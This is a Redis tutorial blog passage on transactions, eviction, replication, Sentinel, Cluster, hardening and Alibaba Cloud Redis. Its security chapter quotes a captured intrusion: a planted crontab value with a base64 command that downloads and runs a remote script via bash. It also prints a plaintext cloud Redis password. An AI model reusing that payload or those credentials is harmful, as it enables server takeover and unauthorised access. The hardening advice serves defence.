127.0.0.1:6379> set k1 v1
OK
127.0.0.1:6379> set k2 v2
OK
127.0.0.1:6379> multi
OK
127.0.0.1:6379(TX)> set k1 11
QUEUED
127.0.0.1:6379(TX)> set k2 22
QUEUED
127.0.0.1:6379(TX)> exec
1) OK
2) OK
127.0.0.1:6379> get k1
"11"
127.0.0.1:6379> get k2
"22"
127.0.0.1:6379> 
  • Transaction failure: syntax error
# Transaction failure: a syntax (compile-time) error. After starting the transaction, set k1 to 111 and k2 to 222, but the k2 command is misspelled, so the whole transaction is discarded and k1, k2 keep their original values
127.0.0.1:6379> FLUSHDB
OK
127.0.0.1:6379> keys *
(empty array)
127.0.0.1:6379> set k1 v1
OK
127.0.0.1:6379> set k2 v2
OK
127.0.0.1:6379> multi
OK
127.0.0.1:6379(TX)> set k1 111
QUEUED
127.0.0.1:6379(TX)> settt k2 222
(error) ERR unknown command `settt`, with args beginning with: `k2`, `222`, 
127.0.0.1:6379(TX)> exec
(error) EXECABORT Transaction discarded because of previous errors.
127.0.0.1:6379> get k1
"v1"
127.0.0.1:6379> get k2
"v2"
127.0.0.1:6379> 

As shown above, the syntax error is reported immediately when the command is submitted, before it ever enters the QUEUED queue. EXEC then discards the entire transaction, so the attempted modifications fail and k1 and k2 both keep their original values.

  • Transaction failure: type error at runtime
127.0.0.1:6379> flushdb
OK
127.0.0.1:6379> keys *
(empty array)
127.0.0.1:6379> set k1 v1
OK
127.0.0.1:6379> set k2 v2
OK
127.0.0.1:6379> multi
OK
127.0.0.1:6379(TX)> set k1 v111
QUEUED
127.0.0.1:6379(TX)> lpush k2 v222
QUEUED
127.0.0.1:6379(TX)> exec
1) OK
2) (error) WRONGTYPE Operation against a key holding the wrong kind of value
127.0.0.1:6379> get k1
"v111"
127.0.0.1:6379> get k2
"v2"

This is a runtime type error. After starting the transaction, k1 is set to v111 and v222 is pushed onto k2 with LPUSH, but k2 holds a String, so the type mismatch is only detected at execution time. The transaction is not rolled back: the failing command is skipped and the rest still execute, so k1 is changed while k2 keeps its original value.

  • Cancel transaction DISCARD
127.0.0.1:6379> multi
OK
127.0.0.1:6379(TX)> set k1 v1
QUEUED
127.0.0.1:6379(TX)> set k2 v2
QUEUED
127.0.0.1:6379(TX)> set k3 v3
QUEUED
127.0.0.1:6379(TX)> discard
OK
127.0.0.1:6379> get k1
(nil)
127.0.0.1:6379> keys *
(empty array)

Why Redis does not support transaction rollback

Most transaction failures are caused by syntax errors or wrong data-type usage: syntax errors are detected when commands are queued, while type errors only surface during execution. Redis keeps its transaction model this simple, without rollback, precisely to protect the core concern under high concurrency: performance. This is a deliberate difference from relational databases and deserves special attention.

Redis expiration policy

Redis is a key-value database, and keys cached in Redis can be given an expiration time. Redis's expiration policy determines how Redis handles a cached key once it expires (a client-side TTL example follows the list below).
There are usually three types of expiration strategies:

  • Timed expiration
    Each key with an expiration time gets its own timer, and the key is cleared the moment it expires. This strategy frees memory as soon as possible but consumes a large amount of CPU to process expirations, hurting cache response time and throughput.
  • Lazy expiration
    A key is checked for expiration only when it is accessed, and cleared if it has expired. This saves the most CPU but is very unfriendly to memory: in the extreme case, a large number of expired keys are never accessed again and therefore never cleared, occupying memory indefinitely.
  • Periodic expiration
    At fixed intervals, Redis scans a certain number of keys in the expires dictionaries of a certain number of databases and clears the expired ones. This is a compromise between the first two: by tuning the scan interval and the time budget of each scan, CPU and memory usage can be balanced for different workloads.
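On the client side, expiration is driven by commands such as SETEX, EXPIRE, and TTL. A minimal Jedis sketch, with illustrative key names and a local connection:

import redis.clients.jedis.Jedis;

public class ExpireDemo {
    public static void main(String[] args) {
        try (Jedis jedis = new Jedis("127.0.0.1", 6379)) {
            jedis.setex("session:1001", 30, "logged-in");  // write with a 30-second TTL
            System.out.println(jedis.ttl("session:1001")); // remaining lifetime in seconds
            jedis.expire("session:1001", 60);              // extend the TTL to 60 seconds
            System.out.println(jedis.ttl("session:1001"));
        }
    }
}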

Redis memory eviction strategy

Redis's memory eviction policy determines how Redis handles a new write that needs additional space when the memory available for caching is exhausted.

In real projects, a common setting is maxmemory-policy allkeys-lru, which evicts the least recently used key (runtime configuration is sketched below).
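As referenced above, the policy can be applied at runtime with CONFIG SET (it should also be written to redis.conf to survive restarts). A minimal Jedis sketch; the 100mb cap and connection details are placeholder values:

import redis.clients.jedis.Jedis;

public class EvictionPolicyDemo {
    public static void main(String[] args) {
        try (Jedis jedis = new Jedis("127.0.0.1", 6379)) {
            jedis.configSet("maxmemory", "100mb");              // cap the memory Redis may use
            jedis.configSet("maxmemory-policy", "allkeys-lru"); // evict the least recently used key
            System.out.println(jedis.configGet("maxmemory-policy"));
        }
    }
}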

[Chapter 8]-Redis’ master-slave replication architecture

Introduction to Redis master-slave architecture

Master-slave replication refers to copying data from one Redis server to other Redis servers. The former is called the master node, and the latter is called the slave node. Data replication is one-way and can only be from the master node to the slave node.

By default, each Redis server is a master node; and a master node can have multiple slave nodes (or no slave nodes), but a slave node can only have one master node.

The slave node can also serve requests. The master node holds the data, and the slave synchronizes it through replication; as writes keep arriving at the master, the slave's data is updated in step.

In addition to the one-master-one-slave model, Redis also supports one master with multiple slaves, which is equivalent to keeping multiple copies of the data.

Redis master-slave architecture principle

  • When the slave database is started, the SYNC command will be sent to the master database.
  • After receiving the SYNC command, the main database starts to save the snapshot in the background (RDB persistence), and caches the commands received during the snapshot saving period.
  • After the snapshot is completed, Redis (Master) sends the snapshot file and all cached commands to the slave database
  • When Redis (Slave) receives RDB and cache commands, it will start loading the snapshot file and execute the received cached commands.
  • Subsequently, whenever the master database receives a write command, it synchronizes that command to the slave database (the whole flow can be kicked off from a client, as sketched below).
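As a demonstration of this flow, replication can be initiated from a client with SLAVEOF. A minimal Jedis sketch, assuming two local instances on ports 6379 and 6380 (both addresses and the class name are placeholders):

import redis.clients.jedis.Jedis;

public class ReplicaDemo {
    public static void main(String[] args) {
        // Turn the node on 6380 into a replica of the node on 6379
        try (Jedis replica = new Jedis("127.0.0.1", 6380)) {
            replica.slaveof("127.0.0.1", 6379);              // kicks off the SYNC flow described above
            System.out.println(replica.info("replication")); // role:slave, master_link_status, ...
        }
    }
}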

Redis master-slave architecture usage scenarios

When separation of reading and writing is required

  • Read-write separation can be achieved through master-slave replication to improve the load capacity of the server.
  • In common scenarios, the frequency of reading is much greater than that of writing.
  • When a single machine Redis cannot cope with a large number of read requests (especially requests that consume resources), multiple slave database nodes can be established through the master-slave replication function. The master database only performs write operations, and the slave database is responsible for read operations.
  • This kind of master-slave replication is more suitable for handling scenarios with more reads and less writes. When a single master database cannot meet the needs, you need to use the cluster function launched after Redis 3.0.

When persistence needs to be offloaded to the slave database

  • Persistence is one of the more time-consuming operations in Redis. To improve performance, you can create one or more slave databases through master-slave replication, enable persistence on the slaves, and disable persistence on the master (for example, disable AOF).
  • When a slave database crashes and restarts, the master automatically resynchronizes the data, so there is no need to worry about data loss.
  • If the master database itself crashes, the problem is addressed with Sentinel, covered later.

Redis master-slave architecture deployment and construction

For installation and deployment details, please see "Introduction to Various Deployments and Usage of Redis" https://blog.csdn.net/wt334502157/article/details/123211953

[Chapter 9]-Redis’ Sentinel Architecture

Introduction to Sentinel

Sentinel is Redis's high-availability solution: a Sentinel system consisting of one or more Sentinel instances can monitor any number of master servers together with all of their slave servers. When a monitored master enters the offline state, Sentinel automatically promotes one of that master's slaves to become the new master.

Sentinel mode installation and deployment

For installation and deployment details, please see "Introduction to Various Deployments and Usage of Redis" https://blog.csdn.net/wt334502157/article/details/123211953

Operating Sentinel through the API

Code example:

package cn.itcast.redis.api_test;

import org.testng.annotations.AfterTest;
import org.testng.annotations.BeforeTest;
import org.testng.annotations.Test;
import redis.clients.jedis.Jedis;
import redis.clients.jedis.JedisPoolConfig;
import redis.clients.jedis.JedisSentinelPool;

import java.util.HashSet;
import java.util.Set;

public class ReidsSentinelTest {

    private JedisSentinelPool jedisSentinelPool;

    @BeforeTest
    public void beforeTest() {
        // JedisPoolConfig configuration object
        JedisPoolConfig config = new JedisPoolConfig();
        // At most 10 idle connections
        config.setMaxIdle(10);
        // At least 5 idle connections
        config.setMinIdle(5);
        // Maximum wait time: 3000 ms
        config.setMaxWaitMillis(3000);
        // Maximum of 50 connections in total
        config.setMaxTotal(50);

        HashSet<String> sentinelSet = new HashSet<>();
        sentinelSet.add("8.130.25.36:26379");
        sentinelSet.add("8.130.48.66:26379");
        sentinelSet.add("8.130.26.68:26379");

        jedisSentinelPool = new JedisSentinelPool("mymaster", sentinelSet, config);
    }

    @Test
    public void keysTest() {
        // 1. To operate Redis we need a connection; obtain one from the sentinel pool
        Jedis jedis = jedisSentinelPool.getResource();

        // 2. Execute the KEYS operation
        Set<String> keySet = jedis.keys("*");

        // 3. Iterate over all keys
        for (String key : keySet) {
            System.out.println(key);
        }

        // 4. Return the connection to the pool
        jedis.close();
    }

    @AfterTest
    public void afterTest() {
        jedisSentinelPool.close();
    }
}

[Chapter 10]-Redis cluster architecture

Introduction and characteristics of Redis cluster

Redis initially relied on the master-slave mode for clustering: if the master went down, a slave had to be manually reconfigured to become the master. Sentinel mode was later introduced for high availability, with sentinels monitoring the master and slaves and automatically promoting a slave when the master goes down. But Sentinel still cannot scale dynamically, so Redis 3.x introduced the Cluster mode.

Redis Cluster is a distributed architecture with multiple nodes. Each node is responsible for data reading and writing operations, and the nodes communicate with each other. Redis Cluster adopts a centerless structure: each node saves data and the entire cluster state, and each node is connected to all other nodes.

Features:

  • All redis nodes are interconnected with each other (PING-PONG mechanism), and a binary protocol is used internally to optimize transmission speed and bandwidth;
  • The failure of a node takes effect only when more than half of the nodes in the cluster detect failures;
  • The client is directly connected to the redis node, without the need for an intermediate proxy layer. The client does not need to connect to all nodes in the cluster, but can connect to any available node in the cluster;
  • redis-cluster maps all physical nodes onto the slots [0-16383] (not necessarily evenly distributed), and the cluster is responsible for maintaining the node <-> slot <-> value mapping;
  • The Redis cluster is pre-divided into 16384 slots. When a key-value pair needs to be placed in the cluster, the slot for the key is computed as CRC16(key) % 16384 (equivalently CRC16(key) & 16383), which decides which slot, and therefore which node, holds the key (see the slot sketch below).
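The slot for any key can be computed client-side with Jedis's CRC16 helper. A minimal sketch; the package path assumes Jedis 3.x (older releases keep the class under redis.clients.util), and the key names are illustrative:

import redis.clients.jedis.util.JedisClusterCRC16;

public class SlotDemo {
    public static void main(String[] args) {
        // CRC16(key) mod 16384 decides which of the 16384 slots a key lands in
        for (String key : new String[]{"k1", "k2", "user:1001"}) {
            System.out.println(key + " -> slot " + JedisClusterCRC16.getSlot(key));
        }
    }
}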

The background to the implementation of redis cluster architecture

  • Master-slave replication cannot achieve high availability
  • As the company develops, the number of users increases and concurrency increases. The business requires higher QPS, and the QPS of a single machine in master-slave replication may not be able to meet business needs;
  • Considering the amount of data, when the existing server memory cannot meet the needs of business data, simply adding memory to the server cannot meet the requirements. At this time, it is necessary to consider the distribution requirements and distribute the data to different servers;
  • Due to network traffic requirements, the business traffic has exceeded the upper limit of the server's network card. Distribution can be considered for offloading;
  • Offline computing requires intermediate buffering and similar capacity.

For any storage engine (MySQL, HDFS, HBase, Redis, Elasticsearch, etc.), once the data volume is large enough, a single machine cannot bear the pressure; the best approach is to distribute the data across multiple servers for storage and management.

For the Redis in-memory database: a single Redis node cannot meet the requirements for the full amount of data. The data is divided into several subsets according to the partition rules.

Advantages of redis cluster architecture

  • The cache never goes down: the cluster always keeps part of itself active. If a master node fails, its slave nodes quickly change roles to become the new master, and the cluster keeps processing commands even if some nodes fail or become unreachable;
  • Fast data recovery: persistence makes it quick to recover from data loss after a crash;
  • Redis can pool the memory of all machines, effectively scaling its capacity;
  • The computing capacity of Redis grows in step with added servers, and its network bandwidth likewise multiplies as machines and network cards are added;
  • The Redis cluster has no central node, so no single node becomes the performance bottleneck of the whole cluster;
  • Data is processed asynchronously, achieving fast reads and writes;

Redis Cluster cluster construction

For installation and deployment details, please see "Introduction to Various Deployments and Usage of Redis" https://blog.csdn.net/wt334502157/article/details/123211953

Operating Redis Cluster through the API

package cn.itcast.redis.api_test;

import org.testng.annotations.AfterTest;
import org.testng.annotations.BeforeTest;
import org.testng.annotations.Test;
import redis.clients.jedis.HostAndPort;
import redis.clients.jedis.JedisCluster;
import redis.clients.jedis.JedisPoolConfig;

import java.io.IOException;
import java.util.HashSet;

public class RedisClusterTest {

    private JedisCluster jedisCluster;

    @BeforeTest
    public void beforeTest() {
        HashSet<HostAndPort> hostAndPortSet = new HashSet<>();
        hostAndPortSet.add(new HostAndPort("8.130.25.36", 6379));
        hostAndPortSet.add(new HostAndPort("8.130.48.66", 6379));
        hostAndPortSet.add(new HostAndPort("8.130.26.68", 6379));
        hostAndPortSet.add(new HostAndPort("8.130.48.74", 6379));
        hostAndPortSet.add(new HostAndPort("8.130.29.79", 6379));
        hostAndPortSet.add(new HostAndPort("8.130.49.100", 6379));

        // JedisPoolConfig configuration object
        JedisPoolConfig config = new JedisPoolConfig();
        // At most 10 idle connections
        config.setMaxIdle(10);
        // At least 5 idle connections
        config.setMinIdle(5);
        // Maximum wait time: 3000 ms
        config.setMaxWaitMillis(3000);
        // Maximum of 50 connections in total
        config.setMaxTotal(50);

        jedisCluster = new JedisCluster(hostAndPortSet, config);
    }

    @Test
    public void setTest() {
        jedisCluster.set("k2", "v2");
        System.out.println(jedisCluster.get("k2"));
    }

    @AfterTest
    public void afterTest() throws IOException {
        jedisCluster.close();
    }
}

[Chapter 11]-Various security strategies of Redis

1. Enable Redis password authentication and set a high-complexity password

Password authentication is enabled through the requirepass configuration item in the redis.conf configuration file.

Open redis.conf, locate the requirepass line, and set it to a password that meets complexity requirements:
1. At least 8 characters long
2. Contains three of the following four character classes:
   English uppercase letters (A to Z)
   English lowercase letters (a to z)
   The 10 basic digits (0 to 9)
   Non-alphabetic characters (such as !, $, #, %, @, ^, &)
3. Avoid weak passwords that have been published, such as abcd.1234 or admin@123
Remove the leading # comment character, then restart Redis
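Once requirepass is set, every client connection must authenticate before issuing commands. A minimal Jedis sketch, with a placeholder password and local connection details:

import redis.clients.jedis.Jedis;

public class AuthDemo {
    public static void main(String[] args) {
        try (Jedis jedis = new Jedis("127.0.0.1", 6379)) {
            jedis.auth("Str0ng!Passw0rd#2022"); // must match requirepass in redis.conf
            System.out.println(jedis.ping());   // PONG once authenticated
        }
    }
}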

2. Do not listen on the public network

Listening on 0.0.0.0 can expose Redis to the Internet or to lateral movement within the intranet, and is easily exploited by attackers.

Configure the redis configuration file redis.conf as follows:
bind 127.0.0.1 (or an intranet IP), then restart Redis

The following records represent a hacker attack:

127.0.0.1:6379> keys backup*
1) "backup1"
2) "backup4"
3) "backup3"
4) "backup2"
127.0.0.1:6379> 
127.0.0.1:6379> 
127.0.0.1:6379> 
127.0.0.1:6379> 
127.0.0.1:6379> get backup1
"\n\n\n*/2 * * * * root echo Y2QxIGh0dHA6Ly9raXNzLmEtZG9nLnRvcC9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash \n\n"
127.0.0.1:6379> FLUSHALL
(error) MISCONF Redis is configured to save RDB snapshots, but it is currently not able to persist on disk. Commands that may modify the data set are disabled, because this instance is configured to report errors during writes if RDB snapshotting fails (stop-writes-on-bgsave-error option). Please check the Redis logs for details about the RDB error.

Key-value pairs that I had never written had appeared, with content pointing to script injection. I also received a warning from Alibaba Cloud:

[Alibaba Cloud] Dear [email protected]: Cloud Shield Cloud Security Center has detected an emergency security event on your server: 39.101.78.174 (redis01): malicious script code execution. It is recommended that you log in to the Cloud Security Center console immediately - Security alarm processing http://a.aliyun.com/f1.I5aW1 for processing.

Typically, an administrator who hits this error will search for a quick fix and loosen the write-related configuration, after which the hacker's injected key-value payload is successfully written to the server. So on a host with a public IP, listening on 0.0.0.0 without authentication is extremely dangerous.

3. Disable startup using the root user

It is risky to run a network service with root privileges (nginx and apache both run under dedicated unprivileged users, but Redis does not by default). The Redis "crackit" attack uses the root user's permissions to replace or append to authorized_keys and thereby gain root login access.

Use root to create a redis user and start the service as that user:
useradd -s /sbin/nologin -M redis
sudo -u redis //redis-server //redis.conf

4. Restrict redis configuration file access permissions

Because the redis password is stored in plain text in the configuration file, it is necessary to prohibit irrelevant users from accessing the configuration file. Set the permissions of the redis configuration file to 600.

chmod 600 //redis.conf

5. Modify the default 6379 port

Avoiding the well-known port reduces the risk of being caught by basic port scans.

Edit the redis configuration file redis.conf, find the line containing port, change the default 6379 to a custom port number, and then restart redis

6. Turn on protected mode

Redis enables protected mode by default. If neither a bind address nor a password is configured, this parameter restricts Redis to local access only and denies external connections.

Turn on protected mode: protected-mode yes

7. Disable or rename dangerous commands

For example, FLUSHALL deletes all data. It is also very dangerous to use the keys * command online when the amount of data is very large. Therefore, online Redis must consider disabling some dangerous commands, or try to prevent anyone from using these commands. Redis does not have a complete management system, but it also provides some solutions.

Modify the redis.conf file and add:
rename-command FLUSHALL ""
rename-command FLUSHDB ""
rename-command CONFIG ""
rename-command KEYS ""
rename-command SHUTDOWN ""
rename-command DEL ""
rename-command EVAL ""
Then restart Redis.
Renaming a command to "" disables it. To keep a command available, rename it to a string that cannot be guessed, for example:
rename-command FLUSHALL joYAPNXRPmcarcR4ZDgC

[Chapter 12]-Cloud database Redis (Alibaba Cloud)

Introduction to cloud database Redis

ApsaraDB for Redis is a database service that is compatible with the open source Redis protocol standard and provides hybrid storage. It is based on dual-machine hot standby architecture and cluster architecture, and can meet business needs such as high throughput, low latency, and flexible configuration.

Advantages of cloud database Redis

  • The hardware is deployed in the cloud, providing complete infrastructure planning, network security and system maintenance services, so you can focus on business innovation.
  • Supports String (string), List (linked list), Set (collection), Sorted Set (ordered set), Hash (hash table), Stream (stream) and other data structures, and also supports advanced features such as Transaction (transactions) and Pub/Sub (message publish/subscribe).
  • Enterprise-grade in-memory database products built on the community edition are also offered, providing performance-enhanced and persistent-memory-based editions.

Cloud database Redis application

Search redis through Alibaba Cloud products, select the appropriate configuration and apply.

After the purchase is completed, you can see the instance information in the Cloud Database Redis console.

From the management page, you can see that it is very rich in functions. It supports many functions such as network whitelist configuration, parameter adjustment, performance monitoring, account management and control, etc.

In the instance information, you can query the redis connection information, which is divided into internal network and external network access.

After finding the connection information, test the connection

[root@wangting ~]# redis-cli -h r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com -p 6379
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> keys *
(error) NOAUTH Authentication required.
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> auth r0uf24af1ijuio7q0pvi Wt@123456
OK
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> keys *
(empty array)
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> set k1 v1
OK
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> set k2 v2
OK

Cloud database Redis page management

ApsaraDB for Redis also offers web-based page management; locate the database connection entry on the console page.

After logging in, you can basically complete all required operations of redis.

Try to write a key-value pair through the interface

Go back to the command line to view

r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> keys *
1) "k3"
2) "k1"
3) "k2"
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> get k3
"\xe6\x9d\x8e\xe6\x98\x93\xe5\xb3\xb0\xe5\xab\x96\xe5\xa8\xbc\xe8\xa2\xab\xe6\x8a\x93\xe4\xba\x86\xef\xbc\x81"
# The Chinese value is not displayed readably in the console because redis-cli was started without the --raw flag
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> exit
[root@wangting ~]# redis-cli -h r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com -p 6379 --raw
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> get k3
NOAUTH Authentication required.
# The new connection is not authenticated; run AUTH again
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> auth r0uf24af1ijuio7q0pvi Wt@123456
OK
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> get  k3
李易峰嫖娼被抓了!
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> 

The key-value pairs entered on the page can be successfully queried.


Origin blog.csdn.net/wt334502157/article/details/126847893